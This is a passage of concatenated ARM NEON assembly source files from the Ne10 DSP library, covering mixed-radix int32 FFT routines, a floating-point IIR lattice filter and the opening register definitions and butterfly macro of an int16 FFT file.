.global ne10_mixed_radix_fft_forward_int32_scaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_forward_int32_scaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_scaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_scaled_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "TRUE", "FALSE"
subs count, count, #2
bgt .L_ne10_radix4_butterfly_scaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_scaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_scaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_scaled_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "TRUE", "FALSE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_scaled_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_scaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_scaled_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_scaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_scaled_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_scaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_scaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_scaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_scaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_scaled_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_scaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_scaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_int32_scaled_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_backward_int32_scaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_backward_int32_scaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_scaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_inverse_scaled_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "TRUE", "TRUE"
subs count, count, #2
bgt .L_ne10_radix4_butterfly_inverse_scaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_inverse_scaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_scaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_inverse_scaled_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "TRUE", "TRUE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_inverse_scaled_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_scaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_scaled_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_scaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_scaled_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_scaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_scaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_scaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_scaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_scaled_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_scaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_scaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_backward_int32_scaled_neon */
/* end of the file */
.end
|
open-vela/external_Ne10 | 14,434 | modules/dsp/NE10_iir.neon.s | @
@ Copyright 2012-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@/*
@ * NE10 Library : dsp/NE10_iir.neon.s
@ */
@/*
@ * Note:
@ * 1. Currently, this is for soft VFP EABI, not for hard vfpv3 ABI yet
@ * 2. In the assembly code, we use D0-D31 registers. So VFPv3-D32 is used. In VFPv3-D16, there will be failure
@ */
#ifdef ENABLE_NE10_IIR_LATTICE_FLOAT_NEON
.text
.syntax unified
@/**
@ *
@ * @brief Processing function for the floating-point IIR lattice filter.
@ *
@ * when tap > 16, you could get
@ * maximized improvement
@ *
@ * @param[in] *S points to an instance of the floating-point IIR lattice structure.
@ * @param[in] *pSrc points to the block of input data.
@ * @param[out] *pDst points to the block of output data.
@ * @param[in] blockSize number of samples to process.
@ */
.align 4
.global ne10_iir_lattice_float_neon
.extern ne10_qMaskTable32
.thumb
.thumb_func
ne10_iir_lattice_float_neon:
PUSH {r4-r12,lr} @push r12: to keep stack 8 bytes aligned
VPUSH {d8-d9}
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
blockSize .req R3
pState .req R4 @/* State pointer */
pKcoeffs .req R5 @/* Coefficient pointer */
pVcoeffs .req R6 @/* Coefficient pointer */
pX .req R7 @/* Temporary pointers for state buffer */
pK .req R8 @/* Temporary pointers for coefficient buffer */
numStages .req R9 @/* Length of the filter */
tapCnt .req R10 @ /* Loop counter */
pTemp .req R11
pMask .req R14 @ /* Mask Table */
mask .req R12
pV .req R12
@/*NEON variale Declaration*/
dTemp3a_0 .dn D0.U32
dTemp3_0 .dn D0.F32
dMask2 .dn D1.U32
qGcurr .qn Q1.F32
dGcurr_0 .dn D2.F32
dGcurr_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
dOut_0 .dn D6.F32
dOut_1 .dn D7.F32
qGK .qn Q4.F32
dGK_0 .dn D8.F32
dGK_1 .dn D9.F32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qFnext .qn Q10.F32
dFnext_0 .dn D20.F32
dFnext_1 .dn D21.F32
qFcurr .qn Q11.F32
dFcurr_0 .dn D22.F32
dFcurr_1 .dn D23.F32
qCoeff0 .qn Q12.F32
dCoeff0_0 .dn D24.F32
dCoeff0_1 .dn D25.F32
qMask1 .qn Q13.U32
dMask1_0 .dn D26.U32
dMask1_1 .dn D27.U32
qMaskTmp .qn Q14.U32
dMaskTmp_0 .dn D28.U32
dMaskTmp_1 .dn D29.U32
qGnext .qn Q15.F32
dGnext_0 .dn D30.F32
dGnext_1 .dn D31.F32
@/* Length of the filter */
LDRH numStages,[pStateStruct],#4
@/* State pointer */
LDR pState,[pStateStruct],#4
@/* Coefficient pointer */
LDR pKcoeffs,[pStateStruct],#4
LDR pVcoeffs,[pStateStruct],#4
@/*Load Mask Valies*/
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pMask,.L_PIC0_GOT_OFFSET
LDR pTemp,.L_GOT_ne10_qMaskTable32
.L_PIC0:
ADD pMask,pMask, pc
LDR pMask,[pMask, pTemp]
#else
LDR pMask,=ne10_qMaskTable32
#endif
AND mask,numStages,#3
ADD tapCnt,mask,#1
ADD pTemp,pMask,mask,LSL #4
ADD tapCnt,pMask,tapCnt,LSL #4
VLD1 {dMaskTmp_0,dMaskTmp_1},[pTemp]
VLD1 {dMask1_0,dMask1_1},[tapCnt]
ADD pTemp,pMask,#16
VEOR qZero,qZero
VLD1 {dMask2},[pTemp]
@/*while blockSize > 0*/
CMP blockSize, #0
BEQ iirLatticeCopy
iirLatticeOuterLoop:
VLD1 {dFcurr_0[],dFcurr_1[]},[pSrc]!
MOV pX,pState
VEOR qAcc0,qAcc0
@/* Initialize Ladder coeff pointer */
ADD pV,pVcoeffs,numStages, LSL #2
MOV pK,pKcoeffs
VLD1 {dGcurr_0,dGcurr_1},[pX]
@/* Load the filter Taps */
VLD1 {dCoeff0_0,dCoeff0_1},[pK]!
SUBS tapCnt,numStages,#4
ADD pV,pV,#4
BLT iirLatticeEndInnerLoop
iirLatticeInnerLoop:
VMUL qGK,qGcurr,qCoeff0
@/* g4k4+g5k5 g6k6+g7k7*/
VPADD dTemp_0,dGK_1,dGK_0
@/*g6k6 g4k4+g5k5*/
VEXT dTemp_1,dTemp_0,dGK_1,#1
@/*g7k7+g6k6+g5k5+g4k4 g6k6+g5k5+g4k4*/
VPADD dTemp_1,dTemp_1,dTemp_0
VMOV dTemp3a_0,dMask2
VBSL dTemp3a_0,dGK_0,dTemp_0
VMOV dTemp_0,dTemp3_0
VSUB qFnext,qFcurr,qTemp
@/* gN(n) = kN * fN-1(n) + gN-1(n-1) */
VMLA qGcurr,qFnext,qCoeff0
@/* y(n) += gN(n) * vN */
SUB pV,pV,#16
VLD1 {dCoeff0_0,dCoeff0_1},[pV]
@/* write gN-1(n-1) into state for next sample processing */
VST1 {dGcurr_0,dGcurr_1},[pX]!
VREV64 qCoeff0,qCoeff0
@/* acc0 += gnext * (*pv--)@ */
VMLA dAcc0_0,dGcurr_0,dCoeff0_1
VMLA dAcc0_1,dGcurr_1,dCoeff0_0
@/* Update f values for next coefficients processing */
VDUP qFcurr,dFnext_1[1]
VLD1 {dGcurr_0,dGcurr_1},[pX]
@/* Load the filter Taps */
VLD1 {dCoeff0_0,dCoeff0_1},[pK]!
SUBS tapCnt,#4
BGE iirLatticeInnerLoop
iirLatticeEndInnerLoop:
@/* If the filter length is not a multiple of 4, compute the remaining filter taps */
ADDS tapCnt,#4
IT GT
SUBGT tapCnt,#1
VMUL qGK,qGcurr,qCoeff0
VPADD dTemp_0,dGK_1,dGK_0
VEXT dTemp_1,dTemp_0,dGK_1,#1
VPADD dTemp_1,dTemp_1,dTemp_0
VMOV dTemp3a_0,dMask2
VBSL dTemp3a_0,dGK_0,dTemp_0
VMOV dTemp_0,dTemp3_0
@/*Mask the Uncessary f values*/
VMOV qFnext,qMaskTmp
VBSL qFnext,qTemp,qZero
VSUB qFnext,qFcurr,qFnext
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff0
@/*Store on to stack for getting proper Fnext*/
SUB pTemp,SP,#20
VST1 {dFnext_0,dFnext_1},[pTemp]
ADD pTemp,pTemp,tapCnt, LSL #2
VLD1 {dTemp_0[],dTemp_1[]},[pTemp]
VMOV qGcurr,qMaskTmp
VBSL qGcurr,qGnext,qTemp
VLD1 {dTemp_0,dTemp_1},[pX]
VMOV qMask,qMask1
VBSL qMask,qGcurr,qTemp
VST1 {dMask_0,dMask_1},[pX]
ADD pX,pX,tapCnt,LSL #2
SUB pV,pV,#16
VLD1 {dCoeff0_0,dCoeff0_1},[pV]
@// MASk the Gnext value used for Output calculation
VMOV qGnext,qMask1
VBSL qGnext,qGcurr,qZero
ADD pX,pX,#4
VREV64 qCoeff0,qCoeff0
VMLA dAcc0_0,dGnext_0,dCoeff0_1
VMLA dAcc0_1,dGnext_1,dCoeff0_0
/*Get Accumulated Result in to single Value*/
VLD1 {dTemp_1},[pDst]
VPADD dTemp_0,dAcc0_0,dAcc0_1
VPADD dTemp_0,dTemp_0
VMOV dMask_0,dMask2
VBSL dMask_0,dTemp_0,dTemp_1
VST1 {dMask_0},[pDst]
ADD pDst,#4
ADD pState,#4
SUBS blockSize,#1
BGT iirLatticeOuterLoop
@/* copy last S->numStages samples to start of the buffer
@for next frame process */
iirLatticeCopy:
AND mask,numStages,#3
ADD pTemp,pMask,mask,LSL #4
LDR pX,[pStateStruct,#-12]
VLD1 {dFcurr_0,dFcurr_1},[pState]!
VLD1 {dMask_0,dMask_1},[pTemp]
SUBS tapCnt,numStages,#4
BLT iirLatticeEnd
iirLatticeCopyLoop:
VST1 {dFcurr_0,dFcurr_1},[pX]!
SUBS tapCnt,#4
VLD1 {dFcurr_0,dFcurr_1},[pState]!
BGE iirLatticeCopyLoop
iirLatticeEnd:
VLD1 {dTemp_0,dTemp_1},[pX]
VBSL qMask,qFcurr,qTemp
VST1 {dOut_0,dOut_1},[pX]
ADD pX,pX,mask, LSL #2
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq blockSize
.unreq pState
.unreq pKcoeffs
.unreq pVcoeffs
.unreq pX
.unreq pK
.unreq numStages
.unreq tapCnt
.unreq pTemp
.unreq pMask
.unreq mask
.unreq pV
@/*NEON variale Declaration*/
.unreq dTemp3a_0
.unreq dTemp3_0
.unreq dMask2
.unreq qGcurr
.unreq dGcurr_0
.unreq dGcurr_1
.unreq qZero
.unreq qMask
.unreq dMask_0
.unreq dMask_1
.unreq dOut_0
.unreq dOut_1
.unreq qGK
.unreq dGK_0
.unreq dGK_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qFnext
.unreq dFnext_0
.unreq dFnext_1
.unreq qFcurr
.unreq dFcurr_0
.unreq dFcurr_1
.unreq qCoeff0
.unreq dCoeff0_0
.unreq dCoeff0_1
.unreq qMask1
.unreq dMask1_0
.unreq dMask1_1
.unreq qMaskTmp
.unreq dMaskTmp_0
.unreq dMaskTmp_1
.unreq qGnext
.unreq dGnext_0
.unreq dGnext_1
VPOP {d8-d9}
POP {r4-r12,pc}
#ifdef __PIC__
@/*GOT trampoline values*/
.align 4
.L_PIC0_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC0+4)
.L_GOT_ne10_qMaskTable32:
.word ne10_qMaskTable32(GOT)
#endif
.end
#endif // ENABLE_NE10_IIR_LATTICE_FLOAT_NEON
|
open-vela/external_Ne10 | 50,237 | modules/dsp/NE10_fft_int16.neon.s | /*
* Copyright 2013-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : dsp/NE10_fft_int16.neon.s
*/
.text
.syntax unified
/* Registers define*/
/*ARM Registers*/
p_fout .req r0
p_fin .req r1
p_factors .req r2
p_twiddles .req r3
stage_count .req r4
fstride .req r5
mstride .req r6
radix .req r12
p_fin0 .req r7
p_fin1 .req r8
p_fin2 .req r9
p_fin3 .req r10
p_tmp .req r11
count .req r2
fstride1 .req r2
fstep .req r7
p_out_ls .req r14
nstep .req r2
mstep .req r7
count_f .req r8
count_m .req r9
p_tw1 .req r10
p_in1 .req r11
p_out1 .req r12
tmp0 .req r9
/*NEON variale Declaration for the first stage*/
q_in0_01 .qn q0
q_in1_01 .qn q1
q_in2_01 .qn q2
q_in3_01 .qn q3
q_s0_2 .qn q4
q_s1_2 .qn q5
q_s2_2 .qn q6
q_s3_2 .qn q7
d_s1_r2 .dn d10
d_s1_i2 .dn d11
d_s3_r2 .dn d14
d_s3_i2 .dn d15
q_out0_2 .qn q8
q_out1_2 .qn q9
q_out2_2 .qn q10
q_out3_2 .qn q11
d_out1_r15 .dn d18
d_out1_i15 .dn d19
d_out3_r37 .dn d22
d_out3_i37 .dn d23
d_in0_r .dn d0
d_in0_i .dn d1
d_in1_r .dn d2
d_in1_i .dn d3
d_in2_r .dn d4
d_in2_i .dn d5
d_in3_r .dn d6
d_in3_i .dn d7
d_in4_r .dn d8
d_in4_i .dn d9
d_in5_r .dn d10
d_in5_i .dn d11
d_in6_r .dn d12
d_in6_i .dn d13
d_in7_r .dn d14
d_in7_i .dn d15
q_in0 .qn q0
q_in1 .qn q1
q_in2 .qn q2
q_in3 .qn q3
q_in4 .qn q4
q_in5 .qn q5
q_in6 .qn q6
q_in7 .qn q7
q_sin0 .qn q8
q_sin1 .qn q9
q_sin2 .qn q10
q_sin3 .qn q11
q_sin4 .qn q12
q_sin5 .qn q13
q_sin6 .qn q14
q_sin7 .qn q15
d_sin3_r .dn d22
d_sin3_i .dn d23
d_sin5_r .dn d26
d_sin5_i .dn d27
d_sin7_r .dn d30
d_sin7_i .dn d31
d_tw_twn .dn d0
d_s3_r .dn d2
d_s3_i .dn d3
d_s7_r .dn d4
d_s7_i .dn d5
q_s3 .qn q1
q_s7 .qn q2
q_s8 .qn q11
q_s9 .qn q15
q_s10 .qn q3
q_s11 .qn q4
q_s12 .qn q5
q_s13 .qn q6
q_s14 .qn q7
q_s15 .qn q0
q_out0 .qn q1
q_out1 .qn q2
q_out2 .qn q8
q_out3 .qn q9
q_out4 .qn q10
q_out5 .qn q12
q_out6 .qn q13
q_out7 .qn q14
d_s10_r .dn d6
d_s10_i .dn d7
d_s11_r .dn d8
d_s11_i .dn d9
d_s14_r .dn d14
d_s14_i .dn d15
d_s15_r .dn d0
d_s15_i .dn d1
d_out2_r .dn d16
d_out2_i .dn d17
d_out3_r .dn d18
d_out3_i .dn d19
d_out6_r .dn d26
d_out6_i .dn d27
d_out7_r .dn d28
d_out7_i .dn d29
/*NEON variale Declaration for mstride loop */
d_fin0_r .dn d0
d_fin0_i .dn d1
d_fin1_r .dn d2
d_fin1_i .dn d3
d_fin2_r .dn d4
d_fin2_i .dn d5
d_fin3_r .dn d6
d_fin3_i .dn d7
d_tw0_r .dn d8
d_tw0_i .dn d9
d_tw1_r .dn d10
d_tw1_i .dn d11
d_tw2_r .dn d12
d_tw2_i .dn d13
q_fin0 .qn q0
q_fin1 .qn q1
q_fin2 .qn q2
q_fin3 .qn q3
q_scr0 .qn q15
q_scr1_r .qn q7
q_scr1_i .qn q8
q_scr2_r .qn q9
q_scr2_i .qn q10
q_scr3_r .qn q11
q_scr3_i .qn q12
q_scr1 .qn q7
q_scr2 .qn q8
q_scr3 .qn q9
q_scr4 .qn q10
q_scr5 .qn q11
q_scr6 .qn q12
q_scr7 .qn q13
d_scr1_r .dn d14
d_scr1_i .dn d15
d_scr2_r .dn d16
d_scr2_i .dn d17
d_scr3_r .dn d18
d_scr3_i .dn d19
d_scr5_r .dn d22
d_scr5_i .dn d23
d_scr7_r .dn d26
d_scr7_i .dn d27
q_fout0 .qn q7
q_fout2 .qn q8
d_fout0_r .dn d14
d_fout0_i .dn d15
d_fout1_r .dn d28
d_fout1_i .dn d29
d_fout2_r .dn d16
d_fout2_i .dn d17
d_fout3_r .dn d30
d_fout3_i .dn d31
.macro BUTTERFLY4X4_WITHOUT_TWIDDLES scaled_flag, inverse
/* radix 4 butterfly without twiddles */
.ifeqs "\scaled_flag", "TRUE"
/* scaled_flag is true*/
vhadd.s16 q_s0_2, q_in0_01, q_in2_01
vhsub.s16 q_s1_2, q_in0_01, q_in2_01
vld2.16 {q_in0_01}, [p_fin0:64]!
vld2.16 {q_in2_01}, [p_fin2:64]!
vhadd.s16 q_s2_2, q_in1_01, q_in3_01
vhsub.s16 q_s3_2, q_in1_01, q_in3_01
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
vhsub.s16 q_out2_2, q_s0_2, q_s2_2
vhadd.s16 q_out0_2, q_s0_2, q_s2_2
.ifeqs "\inverse", "TRUE"
vhsub.s16 d_out1_r15, d_s1_r2, d_s3_i2
vhadd.s16 d_out1_i15, d_s1_i2, d_s3_r2
vhadd.s16 d_out3_r37, d_s1_r2, d_s3_i2
vhsub.s16 d_out3_i37, d_s1_i2, d_s3_r2
.else
vhadd.s16 d_out1_r15, d_s1_r2, d_s3_i2
vhsub.s16 d_out1_i15, d_s1_i2, d_s3_r2
vhsub.s16 d_out3_r37, d_s1_r2, d_s3_i2
vhadd.s16 d_out3_i37, d_s1_i2, d_s3_r2
.endif
.else
/* scaled_flag is false*/
